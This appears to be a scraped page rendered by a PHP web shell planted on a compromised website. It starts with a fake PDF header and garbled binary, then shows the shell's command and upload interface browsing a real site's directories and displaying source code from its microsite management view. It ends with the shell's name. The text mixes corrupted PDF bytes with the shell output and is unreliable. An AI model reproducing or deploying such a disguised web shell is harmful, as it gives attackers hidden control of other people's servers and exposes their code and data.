%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/chalkbank.com/application/views/microsites/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/chalkbank.com/application/views/microsites/managemicrosites.php
  <div class="main-wapper-inner height-all">
 <div class="top-menus">
 <div class="container-fluid">
   <div class="row">
   <div class="col-lg-12">
   
    <h3>Manage Microsites</h3> 
   
     
	 </div><!-- /input-group -->
	 
     </div>
  </div><!-- /.col-lg-6 -->
</div>
<div class="home-inners">
 <div class="container-fluid">
<div id="users">
     <?php
    if ($this->session->flashdata('result_delete')) {
        ?>
        <hr>
        <div class="alert alert-success"><?= $this->session->flashdata('result_delete') ?></div>
        <hr>
        <?php
    }
    ?>
	<?php if($su=='2') {?>
    <a href="<?php echo  site_url('managemicrosites/addmicrosite')?>" class="btn btn-primary btn-xs pull-right linkstylebox" style="margin-bottom:10px;"><b>+</b> Create Microsites</a>
	<?php } ?>
    <div class="clearfix"></div>
    <?php
	
    if ($manage_records) {
        ?>
        <div class="table-responsive">
            <table class="table table-bordered">
                <thead>
                    <tr>
                        <th>#ID</th>
                        <th>Microsite Name</th>
                        <th>Slug</th>
                        <th>Created On</th>
                        <th>Status</th>
                        <th class="text-center">Action</th>
                    </tr>
                </thead>
                <?php $count= 1; foreach ($manage_records as $rows) { ?>
                    <tr>
                        <td><?= $count++ ?></td>
                        <td><?= $rows['page_title'] ?></td>
                        <td><?= $rows['page_url'] ?></td>
                        <td><?= $rows['createdon'] ?></td>
                        <td><?= $rows['status']=='1' ? 'Active' : 'Inactive' ?></td>
                        <td class="text-center">
                           
								<a class="butts-all" href="<?= site_url('microsites/'.$rows['page_url']) ?>" target="_blank" title="View Microsite" ><span class="glyphicon glyphicon-eye-open"></span></a>
								<?php if($su=='2') {?><a class="butts-all" href="?delete=<?= $rows['id'] ?>" class="confirm-delete"><span class="glyphicon glyphicon-trash"></span></a><?php } ?>
                                <a class="butts-all" href="<?= site_url('managemicrosites/addmicrosite') ?>?edit=<?= $rows['id'] ?>"><span class="glyphicon glyphicon-edit"></span></a>
								<a class="butts-all" href="<?= site_url('managemicrosites/managepage') ?>?site_id=<?= $rows['id'] ?>" title="Microsite Page" style="margin-left:4px;"><span class="glyphicon glyphicon-list"></span></a>
                            
                        </td>
                    </tr>
                <?php } ?>
            </table>
	    </div>
    <?php } else { ?>
        <div class="clearfix"></div><hr>
        <div class="alert alert-info">No record found!</div>
    <?php } ?>
</div>
</div>
</div>
</div>

Kontol Shell Bypass